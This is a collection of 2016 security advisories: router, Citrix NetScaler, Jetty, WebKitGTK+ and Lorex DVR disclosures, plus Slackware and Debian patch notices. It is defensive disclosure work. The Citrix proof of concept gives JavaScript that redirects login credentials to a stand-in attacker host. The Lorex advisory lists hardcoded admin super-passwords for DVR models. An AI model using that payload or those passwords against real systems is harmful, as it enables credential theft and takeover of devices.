Multiple Vulnerabilities in Intex Wireless N150 Easy Setup Router

[mohitreload]

Intex Wireless N150 Easy Setup Router 
Vulnerabilities 
1.  Overview
Intex Wireless N150 Easy Setup Router, firmware version: V5.07.51_en_INX01, 
uses default credentials, vulnerable to cross-site request forgery, clear text 
Transmission of Sensitive Information and other attacks.
2.  Vulnerabilities
1.  Credentials Management
2.  Clear text Transmission of Sensitive Information
3.  Auto Complete is enabled
4.  Cross-Site Request Forgery
5.  Improper Neutralization of Input during Web Page Generation
3.  Vulnerabilities Description
The purpose of this paper is to outline the security measures being taken by 
Intex to prevent such attacks in their home routing products, what those 
security measures accomplish, and where they fall short. Following are the 
details of the vulnerabilities that we find during the security assessment.
(1) Credentials Management 
Intex uses a default password of admin for the admin account. A local area 
network attacker can gain privileged access to the web management interface or 
leverage default credentials in remote attacks such as cross-site request 
forgery.
(2) Cleartext Transmission of Sensitive Information
IT transmits sensitive or security-critical data in cleartext in a 
communication channel that can be sniffed by unauthorized actors. 
(3) Auto Complete is enabled
The Web form contains passwords or other sensitive text fields for which the 
browser auto-complete feature is enabled. Auto-complete stores completed form 
field and passwords locally in the browser, so that these fields are filled 
automatically when the user visits the site again.
Sensitive data and passwords can be stolen if the user's system is compromised.
Screenshot: https://www.dropbox.com/s/3hhdyp6iisw1kg6/1.png?dl=0
(4) Cross-Site Request Forgery (CSRF)
Intex contain global cross-site request forgery (CSRF) vulnerability. An 
attacker can perform actions with the same permissions as a victim user, 
provided the victim has an active session and is induced to trigger the 
malicious request. Note that in combination with default credentials, an 
attacker can establish an active session as part of an attack and therefore 
would not require a victim to be logged in.
 Screenshot:https://www.dropbox.com/s/rh5b925ua0g66s8/2.png?dl=0
(5) Improper Neutralization of Input during Web Page Generation
Router does not properly sanitize the Input values. This allows a malicious 
user to inject arbitrary JavaScript. It results in a failure of the Web page to 
properly display content and corrupts the administrative interface.
 Screenshot:1. https://www.dropbox.com/s/civcjng1tq0bh9v/3.png?dl=0
2. https://www.dropbox.com/s/civcjng1tq0bh9v/3.png?dl=0
 
4.  Impact:
An attacker can obtain credentials, configuration information and gain complete 
control of affected devices.
5.  Solutions
Until these vulnerabilities are addressed by the company, users should consider 
the following workarounds.
a)  Restrict access and use strong passwords
As a general good security practice, only allow trusted hosts to connect to the 
LAN. Implement strong passwords for WiFi and for the web management interface. 
Strong passwords can help to prevent blind guessing attempts that would 
establish sessions for CSRF attacks. LAN hosts should not browse the Internet 
while the web management interface has an active session in a browser tab.

[CVE-2016-4945] Login Form Hijacking Vulnerability in Citrix NetScaler Gateway

[Daniel Schliebner]

 PERSICON Security Advisory
===
  Title: Login Form Hijacking vulnerability
Product: Citrix Netscaler
 Vulnerable Version: 11.0 Build 64.35
  Fixed Version: 11.0 Build 66.11
 CVE-ID: CVE-2016-4945
 Impact: medium
  found: 2015-04-07
 by: Dr. Daniel Schliebner 
 http://www.persicon.com
===

Vendor Description:
---
"Citrix (NASDAQ:CTXS) aims to power a world where people, organizations
and things are securely connected and accessible to make the 
extraordinary possible. Its technology makes the world's apps and 
data secure and easy to access, empowering people to work anywhere 
and at any time. Citrix provides a complete and integrated portfolio 
of Workspace-as-a-Service, application delivery, virtualization, mobility, 
network delivery and file sharing solutions that enables IT to ensure 
critical systems are securely available to users via the cloud or 
on-premise and across any device or platform. With annual revenue 
in 2015 of $3.28 billion, Citrix solutions are in use by more than 
400,000 organizations and over 100 million users globally." 
(https://www.citrix.com/about.html)


Vulnerability Description:
--
The login page of the Citrix Netscaler Gateway web frontend is 
vulnerable to a DOM-based Cross-Site-Scripting (XSS) vulnerability due
to improper sanitization of the content of the "NSC_TMAC" cookie.

The vulnerability is located in the file 
 
 /vpn/js/gateway_login_form_view.js
 
in which the the cookie's content is - if set - written to the DOM
via JavaScript. This is done in the following excerpt:

var cookie_action = ns_getcookie("NSC_TMAC"); 
var action_url= '/cgi/login'; 
if (cookie_action) { 
action_url = cookie_action;
UnsetCookie("NSC_TMAC");

This vulnerability can be exploited by an unauthorized remote attacker
by forging the destination address of the login formular in order to
receive login credentials of a victim. This can be achieved by for
example using another XSS vulnerability on the companies web page.


Proof of concept:
-
Assume this vulnerability resides on https://my-foobar-company.com/vpn/.
Assume further, an attacker is able to set a cookie on a victims client
via some other attack vector like, e.g., another XSS vulnerability.

The attacker needs to first (e.g. by XSS) execute the following code
on the client:


document.cookie='NSC_TMAC=https://attack.ers/receive/;' + 
 ' domain=.my-foobar-company.com';
window.location.href='https://my-foobar-company.com/vpn/'


As a consequence, the Netscaler Gateway login formular has the url
"https://attack.ers/receive/; as the value in its "action" attribute
and hence a victim will sent its credentials to the attackers
host when submitting the formular.


Vulnerable / tested versions:
-
Citrix Netscaler 11.0 Build 65.31
Citrix Netscaler 11.0 Build 64.34


Vendor contact timeline:

2016-04-11: Contacting vendor through sec...@citrix.com 
2015-04-11: Vendor response - issue has now the case ID CASE-6597 
and will be forwarded for feedback 
2016-04-12: Vendor response - issue will be reviewed
2016-04-25: Vendor response - issue will be fixed
2016-05-24: Vendor response - issue is fixed in the upcoming
release on 26th May
2016-05-26: Vendor response - issue is fixed in the upcoming
release at 5pm PDT on 26th May
2016-05-27: Status update - fix released by vendor
2016-05-27: Coordinated release of the security advisory


Solution:
-
Remove the use of the cookie content or sanitize its content properly
before writing it to the DOM.


References
--
[1] http://support.citrix.com/article/CTX213313


URL
---
http://persicon.com/tl_files/advisories/PERSICON-advisory-2016-No-1-citrix.t
xt


smime.p7s
Description: S/MIME cryptographic signature

[slackware-security] php (SSA:2016-148-03)

[Slackware Security Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[slackware-security]  php (SSA:2016-148-03)

New php packages are available for Slackware 14.0, 14.1, and -current to
fix security issues.


Here are the details from the Slackware 14.1 ChangeLog:
+--+
patches/packages/php-5.6.22-i486-1_slack14.1.txz:  Upgraded.
  This release fixes bugs and security issues.
  For more information, see:
http://php.net/ChangeLog-5.php#5.6.22
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7456
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5093
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5094
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5096
  (* Security fix *)
+--+


Where to find the new packages:
+-+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.6.22-i486-1_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.6.22-x86_64-1_slack14.0.txz

Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.6.22-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.6.22-x86_64-1_slack14.1.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.22-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.22-x86_64-1.txz


MD5 signatures:
+-+

Slackware 14.0 package:
32c1de91404285e26621694949522eec  php-5.6.22-i486-1_slack14.0.txz

Slackware x86_64 14.0 package:
83c69b58d5ce8ca939d2814fbb5d58b2  php-5.6.22-x86_64-1_slack14.0.txz

Slackware 14.1 package:
830e6aa4120da72592086c5292a24147  php-5.6.22-i486-1_slack14.1.txz

Slackware x86_64 14.1 package:
13024ab60d13e7a07e29736f170267b2  php-5.6.22-x86_64-1_slack14.1.txz

Slackware -current package:
76e1f1d5eb9324d5aa33068ee85ae895  n/php-5.6.22-i586-1.txz

Slackware x86_64 -current package:
126dacd2be02643c32a815f09ff39f58  n/php-5.6.22-x86_64-1.txz


Installation instructions:
++

Upgrade the package as root:
# upgradepkg php-5.6.22-i486-1_slack14.1.txz

Then, restart Apache httpd:
# /etc/rc.d/rc.httpd stop
# /etc/rc.d/rc.httpd start


+-+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com

++
| To leave the slackware-security mailing list:  |
++
| Send an email to majord...@slackware.com with this text in the body of |
| the email message: |
||
|   unsubscribe slackware-security   |
||
| You will get a confirmation message back containing instructions to|
| complete the process.  Please do not reply to this email address.  |
++
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iEYEARECAAYFAldI1LYACgkQakRjwEAQIjMWTACglcf+DOvhWg+gntlkoxBVKbd8
ZZYAn2B/hRIYwxVevnLtsm1emqAQoNiw
=7euT
-END PGP SIGNATURE-

[SECURITY] [DSA 3588-1] symfony security update

[Luciano Bello]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

- -
Debian Security Advisory DSA-3588-1   secur...@debian.org
https://www.debian.org/security/Luciano Bello
May 29, 2016  https://www.debian.org/security/faq
- -

Package: symfony
CVE ID : CVE-2016-1902 CVE-2016-4423

Two vulnerabilities were discovered in Symfony, a PHP framework. 

CVE-2016-1902

Lander Brandt discovered that the class SecureRandom might generate
weak random numbers for cryptographic use under certain settings. If
the functions random_bytes() or openssl_random_pseudo_bytes() are not
available, the output of SecureRandom should not be consider secure.

CVE-2016-4423

Marek Alaksa from Citadelo discovered that it is possible to fill up
the session storage space by submitting inexistent large usernames.

For the stable distribution (jessie), these problems have been fixed in
version 2.3.21+dfsg-4+deb8u3.

For the testing distribution (stretch), these problems have been fixed
in version 2.8.6+dfsg-1.

For the unstable distribution (sid), these problems have been fixed in
version 2.8.6+dfsg-1.

We recommend that you upgrade your symfony packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCAAGBQJXSyojAAoJEG7C3vaP/jd0fkgP/Rg3MGnU+HOjA3yyqMpG44ui
pdYS9uxQHpfqrABEu4BxOOBikJmJOFTVbX6LgKRv7RD8ko0GocEfFVdVyIBg4q37
ym1Kue3pLUYG+ZSDZY3AFTDqOPHdEd1VV0g+NSHOfwQUxB5rZcWbknL1JGiyuZBt
vZ6S6t11zEUppBrjlVqFoLZyqaO/6gbOSEl3IYoBJ8nGvpsEb54Hr1xnA0V61BmO
LSsnXumvkljlWxfLmdbv6eFZZPeqcTUSTrhSY8HSG4fk1hZYmD5zCcmj9HwFwpDV
Ix8qIr2dYqDeP1kXt5vgaJnQnYDcFZswz97vgdc+u+JfpwZzzg5YNLzXtyWMLueb
AoTpYkKqyMKt9OYR2LMrR6MApd53SlUMssb6TGBUvrs75fkkInDnn98x7HMOBANf
eCZjsaR42tm0H2ydi1mEI3kC2OswLXoVakAw//jYlRoznocQ2J11SvDWZ3ZIVN9N
V2AhyotQSD67BYiEkt1n1uln3zoHLxf8rMXRKO1A0CT0TQujyvwucXQ9YrMjcvN9
TbjocikONjdvjrCGD7N5jYh6VFFjyLNgj+erXroGGnFWLq38Ao2+R+7ogMIUl4gX
20ygoVwNeo2Bb+vmUiPOGTmh53GpbuTxMQArpT7/647gwZJhb2CtkzMnDxMBoU2x
E4S/jTK1mnD7vScdwaNs
=gJF9
-END PGP SIGNATURE-

[slackware-security] libxml2 (SSA:2016-148-01)

[Slackware Security Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[slackware-security]  libxml2 (SSA:2016-148-01)

New libxml2 packages are available for Slackware 14.0, 14.1, and -current to
fix security issues.


Here are the details from the Slackware 14.1 ChangeLog:
+--+
patches/packages/libxml2-2.9.4-i486-1_slack14.1.txz:  Upgraded.
  This release fixes bugs and security issues:
  Heap-based buffer underreads due to xmlParseName (CVE-2016-4447).
  Format string vulnerability (CVE-2016-4448).
  Inappropriate fetch of entities content (CVE-2016-4449).
  For more information, see:
http://xmlsoft.org/news.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4447
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4448
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4449
  (* Security fix *)
+--+


Where to find the new packages:
+-+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/libxml2-2.9.4-i486-1_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/libxml2-2.9.4-x86_64-1_slack14.0.txz

Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/libxml2-2.9.4-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/libxml2-2.9.4-x86_64-1_slack14.1.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libxml2-2.9.4-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libxml2-2.9.4-x86_64-1.txz


MD5 signatures:
+-+

Slackware 14.0 package:
c498433ae7d6077a9d5245877aa2c06e  libxml2-2.9.4-i486-1_slack14.0.txz

Slackware x86_64 14.0 package:
c92258a87bb30a6cdce2b5428d640bd5  libxml2-2.9.4-x86_64-1_slack14.0.txz

Slackware 14.1 package:
2b74b913a164a23ad2da10eebf923e46  libxml2-2.9.4-i486-1_slack14.1.txz

Slackware x86_64 14.1 package:
e2dee612c7de77822824e43a61414c2c  libxml2-2.9.4-x86_64-1_slack14.1.txz

Slackware -current package:
98d1ede4a347a49f2ad972ac5339b9e6  l/libxml2-2.9.4-i586-1.txz

Slackware x86_64 -current package:
c2d5721aac77b74d7e47a2a8a372d47a  l/libxml2-2.9.4-x86_64-1.txz


Installation instructions:
++

Upgrade the package as root:
# upgradepkg libxml2-2.9.4-i486-1_slack14.1.txz


+-+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com

++
| To leave the slackware-security mailing list:  |
++
| Send an email to majord...@slackware.com with this text in the body of |
| the email message: |
||
|   unsubscribe slackware-security   |
||
| You will get a confirmation message back containing instructions to|
| complete the process.  Please do not reply to this email address.  |
++
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iEYEARECAAYFAldI1LMACgkQakRjwEAQIjPx0ACfSSTJx0grXawTvgCiMzuoVRCt
cgUAnAim/k4Iz6fu7GM8Kcb0nTqWFh0z
=GWhy
-END PGP SIGNATURE-

[slackware-security] libxslt (SSA:2016-148-02)

[Slackware Security Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[slackware-security]  libxslt (SSA:2016-148-02)

New libxslt packages are available for Slackware 14.0, 14.1, and -current to
fix a security issue.


Here are the details from the Slackware 14.1 ChangeLog:
+--+
patches/packages/libxslt-1.1.29-i486-1_slack14.1.txz:  Upgraded.
  This release fixes bugs and a security issue:
  Fix for type confusion in preprocessing attributes (Daniel Veillard).
  For more information, see:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7995
  (* Security fix *)
+--+


Where to find the new packages:
+-+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/libxslt-1.1.29-i486-1_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/libxslt-1.1.29-x86_64-1_slack14.0.txz

Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/libxslt-1.1.29-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/libxslt-1.1.29-x86_64-1_slack14.1.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libxslt-1.1.29-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libxslt-1.1.29-x86_64-1.txz


MD5 signatures:
+-+

Slackware 14.0 package:
9e81aeb7a44f515dc0d0053395faffea  libxslt-1.1.29-i486-1_slack14.0.txz

Slackware x86_64 14.0 package:
c1186870f78d1c71eed0cb10effd561a  libxslt-1.1.29-x86_64-1_slack14.0.txz

Slackware 14.1 package:
847723b4e9f68c2a2a97869734b4c7c0  libxslt-1.1.29-i486-1_slack14.1.txz

Slackware x86_64 14.1 package:
79eed20e9211c68e94c383e929cc6aa0  libxslt-1.1.29-x86_64-1_slack14.1.txz

Slackware -current package:
40b33089887fe7c5827d6bf901e1cdbf  l/libxslt-1.1.29-i586-1.txz

Slackware x86_64 -current package:
088186d11e38075de6e018f8ae6f7471  l/libxslt-1.1.29-x86_64-1.txz


Installation instructions:
++

Upgrade the package as root:
# upgradepkg libxslt-1.1.29-i486-1_slack14.1.txz


+-+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com

++
| To leave the slackware-security mailing list:  |
++
| Send an email to majord...@slackware.com with this text in the body of |
| the email message: |
||
|   unsubscribe slackware-security   |
||
| You will get a confirmation message back containing instructions to|
| complete the process.  Please do not reply to this email address.  |
++
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iEYEARECAAYFAldI1LQACgkQakRjwEAQIjNtPACggz5OAEc2gvKlP5Z4WhLEjSbi
BUQAnjGxPxRwaPTRLYq0rALLCaHV+Qpu
=xBqf
-END PGP SIGNATURE-

[oCERT 2016-001] Jetty path sanitization issues

[Daniele Bianco]

Description:

Jetty is a Java HTTP (Web) server and Servlet container.

The Jetty path normalization mechanism suffers of an implementation issue
when parsing the request URLs. 

The path normalization logic implemented in the PathResource class and
introduced in Jetty versions 9.3.x can be defeated by requesting malicious
URLs containing specific escaped characters.

Leveraging on this weakness, a malicious user can gain access to protected
resources (e.g. WEB-INF and META-INF folders and their contents) and defeat
application filters or other security constraints implemented in the
servlet configuration.

A workaround to mitigate the issue, using the 'rewrite' module, can
alternatively be implemented as follows:

  $ java -jar ../start.jar --module=rewrite etc/backslashalias.xml

or 

  $ java -jar ../start.jar --add-to-startd=rewrite
  $ java -jar ../start.jar  etc/backslashalias.xml 

Workaround file backslashalias.xml contents:

  
  http://www.eclipse.org/jetty/configure_9_3.dtd;>
  

  

  .*\\.*
  /
  404

  

  


Affected version:

Jetty >= 9.3.0, <= 9.3.8

Fixed version:

Jetty >= 9.3.9

Credit: vulnerability reported by Simon Zuckerbraun of Trend Micro Zero Day 
Initiative

CVE: CVE-2016-4800

Timeline:

2016-05-03: vulnerability report received
2016-05-06: contacted maintainer
2016-05-11: patch provided by maintainer
2016-05-13: assigned CVE
2016-05-18: reporter confirms patch
2016-05-20: contacted affected vendors
2016-05-30: advisory release

References:
http://www.eclipse.org/jetty/download.html

Permalink:
http://www.ocert.org/advisories/ocert-2016-001.html

--
  Daniele Bianco  Open Source Computer Security Incident Response Team
    http://www.ocert.org

  GPG Key 0x9544A497
  GPG Key fingerprint = 88A7 43F4 F28F 1B9D 6F2D  4AC5 AE75 822E 9544 A497

WebKitGTK+ Security Advisory WSA-2016-0004

[Carlos Alberto Lopez Perez]

WebKitGTK+ Security Advisory   WSA-2016-0004


Date reported  : May 30, 2016
Advisory ID: WSA-2016-0004
Advisory URL   : http://webkitgtk.org/security/WSA-2016-0004.html
CVE identifiers: CVE-2016-1854, CVE-2016-1856, CVE-2016-1857,
 CVE-2016-1858, CVE-2016-1859.

Several vulnerabilities were discovered in WebKitGTK+.

CVE-2016-1854
Versions affected: WebKitGTK+ before 2.12.1.
Credit to Anonymous working with Trend Micro's Zero Day Initiative.
WebKit, as used in Apple iOS before 9.3.2, Safari before 9.1.1, and
tvOS before 9.2.1, allows remote attackers to execute arbitrary code
or cause a denial of service (memory corruption) via a crafted web
site, a different vulnerability than CVE-2016-1855, CVE-2016-1856,
and CVE-2016-1857.

CVE-2016-1856
Versions affected: WebKitGTK+ before 2.12.1.
Credit to lokihardt working with Trend Micro's Zero Day Initiative.
WebKit, as used in Apple iOS before 9.3.2, Safari before 9.1.1, and
tvOS before 9.2.1, allows remote attackers to execute arbitrary code
or cause a denial of service (memory corruption) via a crafted web
site, a different vulnerability than CVE-2016-1854, CVE-2016-1855,
and CVE-2016-1857.

CVE-2016-1857
Versions affected: WebKitGTK+ before 2.12.3.
Credit to Jeonghoon Shin@A.D.D and Liang Chen, Zhen Feng, wushi of
KeenLab, Tencent working with Trend Micro's Zero Day Initiative.
WebKit, as used in Apple iOS before 9.3.2, Safari before 9.1.1, and
tvOS before 9.2.1, allows remote attackers to execute arbitrary code
or cause a denial of service (memory corruption) via a crafted web
site, a different vulnerability than CVE-2016-1854, CVE-2016-1855,
and CVE-2016-1856.

CVE-2016-1858
Versions affected: WebKitGTK+ before 2.12.0.
Credit to Anonymous.
WebKit, as used in Apple iOS before 9.3.2, Safari before 9.1.1, and
tvOS before 9.2.1, improperly tracks taint attributes, which allows
remote attackers to obtain sensitive information via a crafted web
site.

CVE-2016-1859
Versions affected: WebKitGTK+ before 2.12.1.
Credit to Liang Chen, wushi of KeenLab, Tencent working with Trend
Micro's Zero Day Initiative.
The WebKit Canvas implementation in Apple iOS before 9.3.2, Safari
before 9.1.1, and tvOS before 9.2.1 allows remote attackers to
execute arbitrary code or cause a denial of service (memory
corruption) via a crafted web site.


We recommend updating to the last stable version of WebKitGTK+. It is
the best way of ensuring that you are running a safe version of
WebKitGTK+. Please check our website for information about the last
stable releases.

Further information about WebKitGTK+ Security Advisories can be found
at: http://webkitgtk.org/security.html

The WebKitGTK+ team,
May 30, 2016



signature.asc
Description: OpenPGP digital signature

[SECURITY] [DSA 3589-1] gdk-pixbuf security update

[Salvatore Bonaccorso]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-3589-1   secur...@debian.org
https://www.debian.org/security/ Salvatore Bonaccorso
May 30, 2016  https://www.debian.org/security/faq
- -

Package: gdk-pixbuf
CVE ID : CVE-2015-7552 CVE-2015-8875

Several vulnerabilities have been discovered in gdk-pixbuf, a toolkit
for image loading and pixel buffer manipulation. A remote attacker can
take advantage of these flaws to cause a denial-of-service against an
application using gdk-pixbuf (application crash), or potentially, to
execute arbitrary code with the privileges of the user running the
application, if a malformed image is opened.

For the stable distribution (jessie), these problems have been fixed in
version 2.31.1-2+deb8u5.

We recommend that you upgrade your gdk-pixbuf packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCgAGBQJXTIJKAAoJEAVMuPMTQ89EJTMP/0lZOykSdff1w5R2cEb34bmB
WzK7oNsvmehDtH59FHdQjmH/KT7RDtQibeAnLPwfDkqtvix76xVthysvdUdloiIT
5kYLc1M8oXomFEkO5/x6Nsfl/LfG7gZbDPWv8hdiAQNVCz6cFqVCVNZdOTPbIkCJ
jhiCrHYMp0eRs0k7C0OsbWQfIlLlbaXgre1MZiRSUd+lyb6XyvVNPkWZ540MVCaN
2++1QhfopCsx1Ts1ImG8wiPQohXPFCBgfYmGf1pq0KonMTfigNNf8BccchA6fBRv
4ikP0OOVq0+fPYLCVT4COFHEYa24nshdSRsD0hADd5P3zC5rsS6k9j2NgQIYZPPa
p4opW2QAK8dIW/sFdPme7G9+wmhtnini+hHCcoYQsJsXeNU8wc2/HF8X1FjfW0Mz
xQ+1gADG3CllFJZi4x6IhWPxOHufnu156nwu2vxO2oCZde9edSpB86IUKxd/l2Br
Rra2dBkhj9ZcH3sai4Gx5q5S+oeKCvZoRoT+eVyK5uouGvqPY9urmf8yW8bRhyu0
Fa+bp8KdrYQuyWSCa31Y0vS+gH9JXs6hBTbDLmcUcY8RpcCDgTrdPQdrwfOVQlu7
IpOuPff+zlipYo/E236Mzuf6Aww3x7A98DS2XTX2zoS0CuJyrXcI0abIkWJYvWOb
6TaO9/LyDrmvGv753VM2
=F1mf
-END PGP SIGNATURE-

[SECURITY] Lorex ECO DVR Hard coded password

[andrew . hofmans]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

1. ADVISORY INFORMATION
===
Product: Lorex ECO DVR
Vendor URL: https://www.lorextechnology.com/
Type: Hard coded password [CWE-259]
Date found: 2016-05-04
Date published: 2016-05-30
CVE: -

2. CREDITS
==
This vulnerability was discovered and researched by Andrew Hofmans. 
https://www.andrewhofmans.com

3. VERSIONS AFFECTED

Vulnerability successfully tested on Lorex LH162400 DVR firmware 
(V5.2.0-20141008) using Lorex Stratus Client and Lorex ECO Stratus Android app. 
Vulnerability may be present on other DVRs that are able to be accessed via 
Lorex's Stratus Client, and Lorex ECO Stratus Android app. Affected DVRs likely 
include the vendors and versions listed specifically in the code.

4. INTRODUCTION
===
LOREX provides businesses and consumers with professional-grade DIY video 
surveillance systems and plug and play wireless video monitoring solutions.

(from the vendor's homepage)

5. VULNERABILITY DETAILS

Remote access to the device is possible using Lorex's Stratus Client which is 
downloadable from the vendor. User is prompted for IP, username/password, and 
port. DVRs are easily identified on a LAN using normal port scanning and 
enumeration. Default username and password is admin:00 (from manufacturer 
manual). On first login admin user is prompted to change password. No matter 
what the password is or what it is changed to the "SuperPassword" grants admin 
access to the device. 

The following Proof-of-Concept is found in plaintext in the [installation 
directory]\new-trunk\js\main.js :

function CheckPassword(){};
$(function(){
$("#btn_reboot_ok").click(function(){
var SuperPassword;
if(gDvr.nMainType == 0x52530003 || (gDvr.nMainType == 
0x52530002 && gDvr.nSubType == 0x50100) || (gDvr.nMainType == 0x5253 && 
gDvr.nSubType == 0x60300)){
SuperPassword = "130901";
}else{
SuperPassword = "070901";
}
if(lgCls.version == "SWANN"){
SuperPassword = "479266";
}else if(lgCls.version == "PROTECTRON"){
SuperPassword = "Ab9842";
}
if($("#reboot_input").val() == gVar.passwd || 
$("#reboot_input").val() == SuperPassword){
MasklayerHide();
$("#reboot_prompt").css("display","none");
CheckPassword();
}

6. RISK
===
To successfully exploit this vulnerability an attacker must have remote access 
to the DVR over port 9000. Attacker can use Lorex's Stratus Client and use the 
hardcoded admin password for specific vendor and model.

The vulnerability allows remote attackers full administrative access to the 
device.

7. SOLUTION
===
Prevent remote access to port 9000 at the firewall. Segregate DVR from normal 
LAN to limited access internal LAN segment / VLAN.

8. REPORT TIMELINE
==
2016-05-04: Discovery of the vulnerability
2016-05-05: Informed applicable Vendors
2016-05-05: Submitted vulnerability to US-CERT
2016-05-05: Response from US-CERT informing similar vulnerability was 
previously reported which vendor ignored. No further attempts will be made.
2016-05-16: Response from Swann
2016-05-30: Advisory released

-BEGIN PGP SIGNATURE-
Version: GnuPG v2

iQIcBAEBCAAGBQJXTIM3AAoJEMRLVTzPHmJSPokQAILGTd4y/q7iyK5w0+uaTh92
0L/FjvEPTs9D1OV82EWjskjzGUKi85R+irG5JYm2TP67km9LSDGu0+4zUPBHP+I9
CCmXgs4ZidW38lhkuauggZaBwUcaED+Ws8yUTqHeaj3q1E9X2UFKbalxbwHE0mI0
6QouLMrKGL8n/qRJfRfp6i7oAeyxrMHC2Aqsd98V5OGeC9/xCQlhMPwTxLCb/P5p
M5qQH5uaxb552KugUodwVhad+qnH4BTvs43pzEl7F9IekmPILqfRNm9I+c3IToIz
E8nRlTHJumlhkj35McWp63d5UWvHseFpK36Ej37F5fBFb5QQHSISpqzp3g1X1zTB
a4ZSGBE6sgYwfi1auw+LglC0MVDz7Opi1jsogqwHRfvEqNKE7R1yhlzMt1hjEFP3
6MqhVS9itr1VjuuS00tjBIEAZ3bJ1r7YF/nUmlzq9NdoD9AEkIOC6+ahybURmJDv
UN1d1t+koHtouVISzWzcRmQw3zID1HxEg55uPnmxuz0Q0fuYUdHAVq7kzMJXJwX5
FpUhYePnYfXO8C3dUnxfHEhb3Fp4q03f0Kvb/6oI2VO3RoX178dApLXaMOi9Dihv
jLwrJOHNfPcn4Q2DnHVoADfQjEQGdt2a4ukvF1EOw/A20ACE1wjEnRG3mGj3NFFR
zUhFAVtD+uJ2gPlOCiip
=NH0s
-END PGP SIGNATURE-